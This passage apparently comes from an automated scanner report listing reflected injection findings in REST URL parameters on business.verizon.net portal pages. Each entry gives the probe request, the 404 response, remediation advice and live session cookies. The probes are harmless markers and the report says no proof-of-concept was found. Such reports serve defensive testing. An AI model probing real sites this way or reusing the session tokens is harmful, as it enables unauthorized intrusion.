Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f888f(a)6302284a143 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smbf888f(a)6302284a143/SMBPortal_portlet_ovrvw_inst_businessNews HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 123
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:11:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:11:36 GMT
Connection: close
Set-Cookie: SaasSessionID=v7qjMnKYd860GTNhZJ6jjzVpypW95XN2bmylJWL2p5jvkt15yhKQ!-1644393018; path=/

Resource /SMBPortal/smbf888f(a)6302284a143/SMBPortal_portlet_ovrvw_inst_businessNews could not be resolved for locale null.

2.305. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2bd79(a)33f966828f9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews2bd79(a)33f966828f9 HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 123
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:11:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:11:40 GMT
Connection: close
Set-Cookie: SaasSessionID=gpYGMnKcppPZ04gMTYSp2QWf6thl4v08wtLLPMv7jZ236WZRBQSB!-1644393018; path=/

Resource /SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews2bd79(a)33f966828f9 could not be resolved for locale null.

2.306. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_topHeadlines [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_topHeadlines

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b9f3b(a)f378423fe87 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortalb9f3b(a)f378423fe87/smb/SMBPortal_portlet_ovrvw_inst_topHeadlines HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 123
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:10 GMT
Connection: close
Set-Cookie: SaasSessionID=v0s1MnKhHZ92SL2dvCnYmFcpCPj6XwSTJjh8QDMfxbY7V1svFGBT!-1644393018; path=/

Resource /SMBPortalb9f3b(a)f378423fe87/smb/SMBPortal_portlet_ovrvw_inst_topHeadlines could not be resolved for locale null.

2.307. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_topHeadlines [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_topHeadlines

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 40c67(a)f8f2375129b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb40c67(a)f8f2375129b/SMBPortal_portlet_ovrvw_inst_topHeadlines HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 123
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:10 GMT
Connection: close
Set-Cookie: SaasSessionID=bLmYMnKhh3rKvV7nkVlSrPjCpQtK88wKQCVy12qVYvFd2h1JTyQj!-1644393018; path=/

Resource /SMBPortal/smb40c67(a)f8f2375129b/SMBPortal_portlet_ovrvw_inst_topHeadlines could not be resolved for locale null.

2.308. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_topHeadlines [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_topHeadlines

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dda52(a)505ba93d73f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_topHeadlinesdda52(a)505ba93d73f HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 123
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:11 GMT
Connection: close
Set-Cookie: SaasSessionID=jQwFMnKbx3C56Gy4gsT2zHQ7yFxZpqG6W1pv1qHx50LjGy6TSjJS!-1644393018; path=/

Resource /SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_topHeadlinesdda52(a)505ba93d73f could not be resolved for locale null.

2.309. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/Scottrade_1 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/Scottrade_1

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 93b2f(a)207e198ae4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal93b2f(a)207e198ae4/smb/Scottrade_1 HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 92
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:11:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:11:29 GMT
Connection: close
Set-Cookie: SaasSessionID=nlrjMnKRrN8cXMlQMtLz1KvRG7kPbgzXWn8FhSnH0T2J1TnTmBG7!-1644393018; path=/

Resource /SMBPortal93b2f(a)207e198ae4/smb/Scottrade_1 could not be resolved for locale null.

2.310. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/Scottrade_1 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/Scottrade_1

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9182f(a)5ca8b8561 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb9182f(a)5ca8b8561/Scottrade_1 HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 91
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:11:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:11:31 GMT
Connection: close
Set-Cookie: SaasSessionID=YtWZMnKTrhhJs1P3VhCMw4ZZ1LkTJ7XS9yd3bPtW1sk02JNdKP1V!-1644393018; path=/

Resource /SMBPortal/smb9182f(a)5ca8b8561/Scottrade_1 could not be resolved for locale null.

2.311. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/Scottrade_1 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/Scottrade_1

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 71f12(a)4a4b580a37e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/Scottrade_171f12(a)4a4b580a37e HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 93
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:11:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:11:36 GMT
Connection: close
Set-Cookie: SaasSessionID=2g7TMnKYLML7pJ1KqVhTxnpZDydp7xMQttSt5Q4BWRgppTcjvGzD!-1644393018; path=/

Resource /SMBPortal/smb/Scottrade_171f12(a)4a4b580a37e could not be resolved for locale null.

2.312. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 61293(a)e2dfd29311e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal61293(a)e2dfd29311e/smb/VerizonDiscountProgram_2 HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 106
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:13 GMT
Connection: close
Set-Cookie: SaasSessionID=2x16MnKd2j3LxnB4p0BbczG64bBjpC2m2JR2SJy6cqn5zpL71JBG!-1644393018; path=/

Resource /SMBPortal61293(a)e2dfd29311e/smb/VerizonDiscountProgram_2 could not be resolved for locale null.

2.313. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5105d(a)8450e0d7c98 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb5105d(a)8450e0d7c98/VerizonDiscountProgram_2 HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 106
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:13 GMT
Connection: close
Set-Cookie: SaasSessionID=v8fvMnKdXD3PDZh7GC9dfTQKWvPX2nc1yL6P1fQnBS2p8fqQLc6S!-1644393018; path=/

Resource /SMBPortal/smb5105d(a)8450e0d7c98/VerizonDiscountProgram_2 could not be resolved for locale null.

2.314. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e7dae(a)4294be2dc23 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

